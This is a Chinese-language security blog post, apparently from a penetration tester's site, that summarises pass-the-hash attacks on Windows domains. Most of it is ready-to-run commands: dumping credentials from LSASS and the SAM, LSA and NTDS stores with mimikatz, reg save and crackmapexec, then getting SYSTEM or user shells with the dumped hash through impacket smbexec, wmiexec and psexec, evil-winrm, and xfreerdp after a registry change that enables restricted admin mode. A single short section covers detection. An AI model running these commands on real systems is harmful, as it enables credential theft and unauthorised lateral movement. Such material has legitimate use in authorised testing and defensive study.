哈希传递攻击总结
横向移动    

哈希传递攻击总结

1,437 次访问
江月
Scroll Down

一、简介

  • 本文为对哈希传递攻击手法的补充。
  • 前文:传送门
  • NTLM 认证流程

二、哈希提取

2.1 mimikatz

  • 提取哈希输入到hash.txt文件中
    • mimikatz.exe privilege::debug "sekurlsa::logonpasswords" exit > hash.txt

image-20240118132205587

2.2 注册表提取

  • 依赖工具:impacket-secretsdump
  • 提取SAM数据库及解密信息
    • reg save hklm\sam sam.hive
    • reg save hklm\system system.hive

image-20240118133639750

  • 解密SAM数据库
    • impacket-secretsdump -sam sam.hive -system system.hive LOCAL

image-20240118133315729

2.3 进程转储

  • 任务管理器==> 详细信息 ==> lsass.exe ==> 创建转储文件

image-20240118134151534

  • 转储文件解析
    • mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit >hash.txt

image-20240118135033810

2.4 Crackmapexec

  • 远程提取SAM
    • crackmapexec smb IP -u username -p password --sam

image-20240118135909510

  • 远程提取LSA
    • crackmapexec smb IP -u username -p password --lsa
    • 注:LSA参考:传送门

image-20240118140132547

2.5 NTDS提取

  • 本地提取:传送门
  • 远程提取
    • crackmapexec smb IP -u username -p password --ntds

image-20240118135713357

三、哈希传递

3.1 smbexec

  • 补充:直接使用将导致乱码,请加上-codec gbk,以此解决命令无法解析的问题!

  • 格式:python3 smbexec.py domain/user@ip -hashes :hash -codec gbk

  • impacket-smbexec tech.com/administrator@192.168.30.227 -hashes :224b59e02691d9be47ee26ca2313c1d2

  • 取得账户权限为:system

image-20240118142207381

3.2 wmiexec

  • 格式:python3 wmiexec.py domain/user@ip -hashes :hash -codec gbk

  • impacket-wmiexec tech.com/administrator@192.168.30.227 -hashes :224b59e02691d9be47ee26ca2313c1d2

  • 取得账户权限为:认证账户

image-20240118142306003

3.3 psexec

  • 格式:python3 psexec.py domain/user@ip -hashes :hash -codec gbk
  • impacket-psexec tech.com/administrator@192.168.30.227 -hashes :224b59e02691d9be47ee26ca2313c1d2
  • 取得账户权限为:system

image-20240118142457745

3.4 winrm

  • 格式:evil-winrm -i TargetIP -u username -H hash

  • evil-winrm -i 192.168.30.227 -u administrator@tech.com -H 224b59e02691d9be47ee26ca2313c1d2

  • 取得账户权限为:认证账户

image-20240118142737864

3.5 mimikatz

  • mimikatz联合`PSTools``
  • 开启特殊会话窗口:mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:tech.com /ntlm:224b59e02691d9be47ee26ca2313c1d2"
  • 于自动开启的窗口中使用PSTools-PSexecPsExec.exe \\192.168.30.227 cmd
  • 补充:

image-20240118144350140

3.6 RDP

  • 我们可以使用 RDP工具执行 RDP PTH 攻击,以获得对目标系统的 GUI 访问权限xfreerdp

  • 但是需要启用受限管理模式以允许 PTH,否则无法通过RDP访问目标主机

  • 注意:受限管理模式默认关闭,所以需要额外配置才能通过PTH的方式通过RDP访问目标

  • 开启受限模式

    • reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
    • 注:开启受限模式注册表,仅需普通账户权限即可

  • PTH

    • xfreerdp /v:192.168.30.227 /u:administrator /pth:224b59e02691d9be47ee26ca2313c1d2

image-20240118150522988

四、溯源

  • 事件特征:登录账户为特权账户或高权限账户,但使用者信息为空
    image-20240220154744223

© 本文著作权归作者所有,转载前请务必署名

最新文章
文件上传攻击

一、简介文件上传攻击是一种利用系统的上传点,上传恶意文件,以此来获取系统信息或取得系统控制权的一种方
密码突破

采用技术手段,获取到加密哈希的明文显示。取得加密文件的解密参数。
哈希传递攻击总结

哈希传递攻击手法总结
小程序抓包前置准备

一、背景一般的渗透测试一般都是基于WEB进行的,对于Android上的APP、小程序进行抓包测试,则
Redis未授权利用

一、简介redis默认情况下,绑定在0.0.0.0:6379,若没有采用相关的策略,如添加防火墙规则
分类
CVE复测笔记 cve
项目搭建 项目搭建
hacker hacker
私有资料 privacy
网络安全 网络安全
小众知识 小众知识
实用工具 实用工具
默认分类 default
标签
WEB web
抓包 抓包
Domain domain
提权 提权
横向移动 横向移动
PDF pdf
Adobe adobe
后门 后门
摄像头 摄像头
SQL注入 sql注入
proxy proxy
远程桌面 远程桌面
服务器 服务器
AD ad
exsi exsi
GlassFish glassfish
自动化运维 自动化运维
娱乐 娱乐
red team redteam
attack attack
python python
网络协议 网络协议
VPS vps
科学sh 科学sh
漏洞复现 漏洞复现
语法 语法
正则 正则
云服务 云服务
内网穿透 内网穿透
AI ai
wifi wifi
kali kali
网络 网络
账号 账号
电脑 电脑
windows windows
脚本 脚本
DDOS ddos
网络安全 网络安全
技巧 技巧
开源项目 开源项目
效率 效率
插件 插件
高级语法 高级语法
sqlmap sqlmap
linux linux
破解 破解
代码 代码
视频 视频
科学上网 科学上网
工具 工具
实用性 实用性